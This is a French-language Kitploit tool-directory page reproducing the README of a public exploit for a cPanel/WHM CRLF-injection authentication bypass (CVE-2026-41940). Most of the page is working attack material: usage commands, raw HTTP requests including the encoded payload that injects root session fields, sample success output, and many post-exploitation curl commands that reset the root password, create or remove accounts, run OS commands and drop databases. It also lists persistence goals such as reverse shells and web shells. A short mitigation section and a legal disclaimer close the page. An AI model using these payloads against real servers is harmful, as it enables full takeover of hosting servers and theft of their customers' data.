Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cPanel-WHM-CVE-2026-41940-auth-bypass-exploit — Exploit critique de contournement d'authentification pour cPanel/WHM CVE-2026-41940. Exploite l'injection CRLF dans le démon cpsrvd pour obtenir un accès root WHM sans identifiants. Inclut la détection de version, une journalisation verbose, le support des proxys, le rapport JSON et l'énumération de comptes post-exploitation. Réservé aux tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
2il y a 25 joursPas encore vérifié

À propos

Exploit critique de contournement d'authentification pour cPanel/WHM CVE-2026-41940. Exploite l'injection CRLF dans le démon cpsrvd pour obtenir un accès root WHM sans identifiants. Inclut la détection de version, une journalisation verbose, le support des proxys, le rapport JSON et l'énumération de comptes post-exploitation. Réservé aux tests de sécurité autorisés.

Partager

CVE-2026-41940 - Exploit de contournement d'authentification de cPanel & WHM

PythonLicenseCVECVSSStatus

Contournement critique de l'authentification par injection CRLF dans le démon cpsrvd de cPanel/WHM


📋 Vue d'ensemble

CVE-2026-41940 est une vulnérabilité critique de contournement d'authentification dans cPanel & WHM qui permet à des attaquants distants non authentifiés d'obtenir un accès administratif de niveau root au serveur. La vulnérabilité existe dans la gestion des sessions du démon cpsrvd, plus précisément dans Cpanel/Session.pm, où la neutralisation inappropriée des délimiteurs de ligne (CRLF) dans le cookie whostmgrsession et les en-têtes Authorization permet l'injection de paramètres de session.

Score CVSSType d'exploitImpactVecteur d'attaque
9.8Contournement d'authentificationAccès rootRéseau
c

⚡ Fonctionnalités clés

Cet outil d'exploitation offre les fonctionnalités clés suivantes :

  • 🔓 Contournement d'authentification - Obtenir un accès WHM root sans identifiants

  • 🛡️ Techniques de contournement multiples - Essaie automatiquement différentes méthodes de vérification

  • 🌐 Prise en charge des proxys - Achemine le trafic via des proxys HTTP/HTTPS

  • 📊 Rapports JSON - Génère des rapports d'évaluation détaillés

  • 📝 Journalisation complète - Mode débogage verbeux avec horodatages

  • 🔍 Détection de version - Détecte et vérifie automatiquement les versions vulnérables

  • 👥 Énumération des comptes - Liste tous les comptes cPanel après exploitation

  • 🎯 Points de terminaison multiples - Essaie divers points de terminaison API pour la vérification


🚨 Détails de la vulnérabilité

🔬 Analyse technique

La vulnérabilité provient de deux problèmes principaux :

  1. Injection CRLF dans le stockage de session - La fonction saveSession ne parvient pas à neutraliser les caractères de nouvelle ligne (\n) dans le champ pass avant de l'écrire dans le fichier de session, ce qui permet l'injection de paramètres de session arbitraires.

  2. Contournement du codage conditionnel - Lorsque le cookie de session ne contient pas la partie ob (le segment après la virgule), la valeur pass est écrite sans codage (en clair), ce qui permet l'injection de séquences CRLF.

🎯 Versions affectées


📦 Installation

Prérequis

root@kitploit:~
# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

Fichier requirements

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Cloner le dépôt

root@kitploit:~
git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 Utilisation

Utilisation de base

root@kitploit:~
python3 exploit.py --target https://target.com:2087

Utilisation avancée

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

Exemple de sortie

root@kitploit:~
=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 Arguments de ligne de commande


🔬 Méthodologie d'exploitation

Étape 1 : Obtenir une session pré-authentification

L'exploit obtient d'abord un cookie de session pré-authentification en tentant une connexion échouée :

root@kitploit:~
POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

Réponse :

root@kitploit:~
Set-Cookie: whostmgrsession=base64_encoded_data

Étape 2 : Injection CRLF

L'en-tête Authorization conçu injecte des paramètres de session malveillants :

root@kitploit:~
GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]

Charge utile décodée :

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Étape 3 : Extraction du jeton

Le serveur répond avec une redirection contenant le jeton de session administratif :

root@kitploit:~
Location: /cpsess1234567890/

Étape 4 : Vérification de l'accès

L'exploit tente plusieurs méthodes de vérification pour confirmer l'accès root.


🎯 Commandes de post-exploitation

Une fois l'exploit réussi, utilisez les commandes suivantes avec le jeton obtenu :

Informations sur le serveur

root@kitploit:~
# Get server version
curl -k "https://target.com:2087/cpsess-1234567890/json-api/version?api.version=1"

# Get server information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_info?api.version=1"

# Get hostname
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_hostname?api.version=1"

# Get load average
curl -k "https://target.com:2087/cpsess-1234567890/json-api/loadavg?api.version=1"

# Get CPU usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_cpu_usage?api.version=1"

# Get memory usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_memory_usage?api.version=1"

# Get disk usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_disk_usage?api.version=1"

# Server time
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_time?api.version=1"

# Service status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/service_status?api.version=1"

Gestion des comptes

root@kitploit:~
# List all cPanel accounts
curl -k "https://target.com:2087/cpsess-1234567890/json-api/listaccts?api.version=1"

# List accounts with details
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_list?api.version=1"

# Account summary
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_summary?api.version=1"

# Domain information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/domain_info?api.version=1"

# Email statistics
curl -k "https://target.com:2087/cpsess-1234567890/json-api/email_stats?api.version=1"

# PHP configuration
curl -k "https://target.com:2087/cpsess-1234567890/json-api/php_ini?api.version=1"

Scripts WHM

root@kitploit:~
# Server status
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/serverstatus"

# System information
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/sysinfo"

# List accounts (alternative )
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/listaccts"

# Show processes
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/showprocs"

# Disk usage
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/diskusage"

Actions administratives

root@kitploit:~
# Change user password
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/passwd" \
  -d "user=root&pass=NewP@ss123"

# Create new account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/createacct" \
  -d "username=testuser&domain=test.com&password=TestPass123&plan=default"

# Execute OS commands
curl -k -X POST "https://target.com:2087/cpsess-1234567890/scripts/run_script" \
  -d "script=id"

# Suspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/suspendacct" \
  -d "user=testuser"

# Unsuspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/unsuspendacct" \
  -d "user=testuser"

# Remove account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/removeacct" \
  -d "user=testuser"

Informations de sécurité

root@kitploit:~
# Get security advisor info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/security_advisor?api.version=1"

# Get SSH key info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_ssh_keys?api.version=1"

# Check firewall status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/firewall_status?api.version=1"

# Get SSL certificates
curl -k "https://target.com:2087/cpsess-1234567890/json-api/ssl_certificates?api.version=1"

Opérations sur les bases de données

root@kitploit:~
# List MySQL databases
curl -k "https://target.com:2087/cpsess-1234567890/json-api/databases?api.version=1"

# Create database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/create_db" \
  -d "db=test_db"

# Delete database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/delete_db" \
  -d "db=test_db"

# List database users
curl -k "https://target.com:2087/cpsess-1234567890/json-api/db_users?api.version=1"

🛡️ Capacités de post-exploitation

Une fois l'accès WHM root obtenu, un attaquant peut :

Gestion des comptes

  • 🔍 Lister tous les comptes cPanel

  • 👤 Créer de nouveaux comptes cPanel

  • 🔑 Modifier les mots de passe des comptes

  • ❌ Supprimer ou suspendre des comptes

Contrôle du serveur

  • 🖥️ Exécuter des commandes OS

  • 🔄 Changer le mot de passe root

  • 📊 Consulter les statistiques du serveur

  • 🗄️ Gérer les bases de données MySQL

Persistance

  • 🐚 Déployer des shells inversés

  • 🌐 Installer des web shells

  • 🗝️ Installer des portes dérobées

  • 🔒 Créer des comptes administrateur cachés

Accès aux données

  • 📁 Accéder à tous les fichiers du serveur

  • 💾 Exporter les bases de données

  • 📧 Lire les comptes e-mail

  • 🔐 Accéder aux certificats SSL


🚨 Atténuation d'urgence

Actions immédiates

root@kitploit:~
# 1. Update cPanel/WHM immediately
/scripts/upcp --force

# 2. Invalidate all active sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

# 3. Restrict WHM access to trusted IPs
# Add to /etc/csf/csf.conf
# Or configure firewall

# 4. Enable Multi-Factor Authentication (MFA )
# WHM > Security Center > Two-Factor Authentication

# 5. Change ALL passwords
# - Root password
# - All cPanel user passwords
# - Database passwords
# - FTP passwords

# 6. Audit system for backdoors
find / -type f -mtime -7 -name "*.php" -o -name "*.pl" -o -name "*.cgi"

# 7. Check for malicious cron jobs
crontab -l
for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done

# 8. Check SSH authorized keys
for user in $(cut -f1 -d: /etc/passwd); do
  echo "=== $user ==="
  cat /home/$user/.ssh/authorized_keys 2>/dev/null
done

Prévention à long terme

  • ✅ Implémentez une validation stricte des entrées pour empêcher l'injection CRLF

  • ✅ Déployez des règles WAF pour détecter et bloquer les requêtes malveillantes

  • ✅ Activez les restrictions d'accès par adresse IP pour WHM

  • ✅ Mettez régulièrement à jour cPanel/WHM vers les dernières versions

  • ✅ Effectuez des évaluations de sécurité régulières

  • ✅ Surveillez les journaux pour détecter toute activité suspecte

  • ✅ Implémentez le principe du moindre privilège

  • ✅ Activez Security Advisor dans WHM

  • ✅ Audits de sécurité réguliers

  • ✅ Implémentez un système de détection d'intrusion


📊 Exemple de rapport

root@kitploit:~
{
  "timestamp": "2026-07-26T22:23:25.123456",
  "target": "https://target.com:2087",
  "status": "success",
  "token": "1234567890",
  "detected_version": "11.110.0.85",
  "vulnerable": true,
  "verification_method": "url_format",
  "notes": "Root access confirmed; Token verified",
  "exploit_name": "CVE-2026-41940",
  "cvss_score": "9.8",
  "description": "cPanel/WHM Authentication Bypass via CRLF Injection",
  "exploit_version": "1.0"
}

⚠️ Avertissement légal

Cet outil est fourni uniquement à des fins éducatives et de recherche en sécurité éthique. L'auteur et les contributeurs ne sont pas responsables de tout usage abusif ou dommage causé par ce logiciel. En utilisant cet outil, vous acceptez d'assumer l'entière responsabilité de vos actions. Assurez-vous d'avoir une autorisation explicite avant de tester un système quelconque.


🤝 Contribution

Nous accueillons les contributions ! Veuillez suivre ces étapes :

  1. 🍴 Forkez le dépôt

  2. 🔧 Créez votre branche de fonctionnalité (git checkout -b feature/amazing-feature)

  3. 💾 Commitez vos modifications (git commit -m 'Add amazing feature')

  4. 📤 Poussez la branche (git push origin feature/amazing-feature)

  5. 🔃 Ouvrez une demande d'extraction (Pull Request)


📝 Journal des modifications

v1.0.0 (2026-07-26)

  • 🎉 Version initiale

  • 🔓 Implémentation de l'exploit d'injection CRLF

  • 🛡️ Techniques multiples de contournement de la vérification

  • 📊 Génération de rapports JSON

  • 🌐 Prise en charge des proxys

  • 📝 Journalisation complète

  • 🔍 Détection de version

  • 👥 Énumération des comptes

  • 📚 Commandes complètes de post-exploitation


📧 Contact

  • Avis de sécurité - [email protected]

  • Problèmes GitHub - Créer une issue


📚 Références

  1. Détail de CVE-2026-41940

  2. Avis de sécurité cPanel

  3. Recherche watchTowr

  4. Aide-mémoire sur l'injection CRLF

  5. Documentation API WHM


⚠️ RAPPELEZ-VOUS : Un grand pouvoir implique de grandes responsabilités ! Utilisez de manière éthique ! ⚠️

Fait avec ❤️ pour la communauté de la sécurité

Télécharger l’outil
AttributValeur
ID CVECVE-2026-41940
Score CVSS9.8 (Critique)
Type de vulnérabilitéContournement d'authentification par injection CRLF
Composant affectéDémon cpsrvd (Cpanel/Session.pm)
Vecteur d'attaqueRéseau
ImpactAccès root complet
ExploitationÀ distance, sans authentification
Canal de publicationVulnérable jusqu'àVersion corrigée
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5
ArgumentCourtRequisDescription
--target-t✅URL cible (par ex., https://target.com:2087 )
--verbose-v❌Activer la sortie verbeuse/débogage
--proxy-p❌URL du proxy (par ex., http://127.0.0.1:8080 )
--output-o❌Fichier de sortie pour le rapport JSON
--timeout❌Délai d'expiration des requêtes en secondes (défaut : 10)
--list-accounts-l❌Lister les comptes cPanel après exploitation réussie
--version❌Afficher la version de l'exploit